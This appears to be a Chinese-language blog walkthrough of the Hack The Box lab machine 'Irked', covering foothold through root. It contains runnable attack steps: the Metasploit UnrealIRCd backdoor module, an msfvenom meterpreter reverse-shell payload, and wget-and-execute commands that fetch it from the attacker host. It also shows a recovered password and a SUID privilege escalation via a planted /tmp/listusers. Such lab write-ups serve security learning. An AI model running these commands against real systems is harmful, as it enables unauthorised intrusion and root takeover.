Nmap scan report for 10.10.10.117
Host is up (0.27s latency).
Not shown: 879 closed ports, 118 filtered ports
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)·
访问http 80端口,提示IRC
默认IRC端口6667、6697
针对性的扫了一波:
图片.png
msf:use unix/irc/unreal_ircd_3281_backdoor
修改端口为6697
打一波拿到控制权,不过用户权限较低
图片.png
- 下面反弹meterpreter
利用msfvenom生成linux木马:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.27 LPORT=9999 -f elf -o /var/www/html/meterpreter/payload_backdoor.elf
本机开启另一个msf窗口开启监听模块:
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 10.10.14.27
set LPORT 9999
之后在服务器中执行
wget http://10.10.14.27/meterpreter/payload_backdoor.elf
chmod +x payload_backdoor.elf
./payload_backdoor.elf
成功反弹shell
- 尝试提权
查看系统版本
uname -a
Linux irked 3.16.0-6-686-pae #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) i686 GNU/Linux
meterpreter > sysinfo
Computer : irked.irked.htb
OS : Debian 8.10 (Linux 3.16.0-6-686-pae)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
系统的提权exp都试了一遍,未成功。
- 最终无意中找到WP发现是图片隐写=-=
看到user.txt同目录下还有.backup,提示有图片隐写
ls /home/djmardov/Documents/
user.txt
cat /home/djmardov/Documents/.backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
结合web页面的图片=-=
得到密码:Kab6h+m+bbp2J:HG
ssh连接:ssh djmardov@10.10.10.117
得到user.txt
- 下面继续寻找root.txt
在Linux下,查找根目录下具有SUID/SGID的文件
find / -type f -perm u+s,g+s
发现/usr/bin/viewuser文件,好像还要逆向一下
贴一下wp上的源码:
这就很明了了,用上面生成的msf后门下到/tmp/listusers,随后运行/usr/bin/viewuser即可直接提升到root权限,我还以为要反弹shell回去,结果都一样拉,获取root权限,得到root.txt。
参照wp把题做完了,实际想一想确实太菜了,自己可能做不出来(图片隐写有点难发现~),但是收获也还是很大的。
网友评论